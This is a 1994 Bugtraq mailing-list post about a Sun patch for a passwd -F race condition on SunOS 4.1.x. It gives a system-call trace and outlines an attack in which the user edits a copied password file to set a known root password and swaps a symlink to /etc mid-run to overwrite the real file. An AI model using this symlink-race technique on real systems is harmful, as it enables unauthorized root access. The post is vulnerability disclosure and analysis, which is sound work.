Bugtraq mailing list archives
Re: Sun Patch Id #102060-01
From: mouse () Collatz McRCIM McGill EDU (der Mouse)
Date: Mon, 19 Dec 1994 04:30:38 -0500
So does anybody know more about this one??? I've tried a few things, but haven't figured it out yet. [...]
Problem Description:
1169007: Security: Root access possible on SunOS 4.1.x via forced passwd race condition.
This patch restricts the use of the passwd command's -F option [...]
I just now did a simple experiment: I copied /etc/passwd to /tmp/gleep and ran "passwd -F /tmp/gleep" under the control of trc. Here's the trace, edited to emphasize the relevant excerpts: open (0xf7fffa2e="/tmp/gleep", 0x0=O_RDONLY) = 3 [this is the first time /tmp/gleep appears in the trace] fstat (3, 0xf7fff704) = 0 read (3, 0xc708, 8192) = 448: [the passwd file] close (3) = 0 gethostname (0x9ae0, 64) = 0: [our hostname] ioctl (1, 0x40125401=TCGETA, 0xf7ffefe4) = 0: tio=[...] write (1, 0xf78028d0="Changing password for mouse on [hostname].\n", 58) = 58 access (0xf77247d7="/etc/security/passwd.adjunct", 0x0=F_OK) = -1 ENOENT (No such file or directory) [I don't know how this may interact with shadow passwords.] open (0xf7723ae5="/dev/tty", 0x0=O_RDONLY) = 3 [catch SIGINT] [frob tty settings] [read new password] [do it all over again, for second copy of new password] [do a bunch of signal stuff: SIGHUP, SIGINT, SIGQUIT, SIGTSTP] umask (0000) = 0022 open (0xcb80="/tmp/ptmp", 0xa01=O_WRONLY|O_CREAT|O_EXCL, 0644) = 3 [experimentation indicates the directory portion is taken from /tmp/gleep's directory portion] getdtablesize () = 64 setrlimit (0x0=RLIMIT_CPU, 0xf7fff878=cur=INFINITY max=INFINITY) = 0 setrlimit (0x1=RLIMIT_FSIZE, 0xf7fff878=cur=INFINITY max=INFINITY) = 0 open (0xf7fffa2e="/tmp/gleep", 0x0=O_RDONLY) = 4 fstat (4, 0xf7fff7dc) = 0 read (4, 0xcb98, 8192) = 448: [the passwd file] fstat (3, 0xf7fff058) = 0 read (4, 0xcb98, 8192) = 0: close (4) = 0 write (3, 0xeba0=[the passwd file with modified entry], 448) = 448 close (3) = 0 rename (0xcb80="/tmp/ptmp", 0xf7fffa2e="/tmp/gleep") = 0 Thus, my idea of how one can exploit this is [note: this is not an exploit script!] would be: % mkdir bar % cp /etc/passwd bar [edit bar/passwd to have a known root password] % ln -s /etc foo % passwd -F $cwd/foo/passwd Now, you need to relink foo to point to bar, somewhere between the open of $cwd/foo/ptmp and the open of $cwd/tmp/passwd, and then relink it back before the rename() occurs. If the passwd file is large, hitting the second window may not be hard. der Mouse mouse () collatz mcrcim mcgill edu
Current thread:
- Re: Sun Patch Id #102060-01 der Mouse (Dec 19)
- Re: Sun Patch Id #102060-01 Dave Horsfall (Dec 19)
- Re: Sun Patch Id #102060-01 Rens Troost (Dec 20)
- <Possible follow-ups>
- Re: Re: Sun Patch Id #102060-01 Ed Arnold (Dec 19)
- Re: Re: Sun Patch Id #102060-01 Scott D. Yelich (Dec 20)
- Replacement for lockd? Dave Horsfall (Dec 20)
- Re: Re: Re: Sun Patch Id #102060-01 Pete Hartman (Dec 19)
- Re: Sun Patch Id #102060-01 Casper Dik (Dec 19)
- Re: Re: Re: Sun Patch Id #102060-01 bmanning () isi edu (Dec 20)
- Re: Re: Re: Sun Patch Id #102060-01 Jeff Smith (Dec 20)
- Re: Sun Patch Id #102060-01 der Mouse (Dec 20)
(Thread continues...)
- Re: Sun Patch Id #102060-01 Dave Horsfall (Dec 19)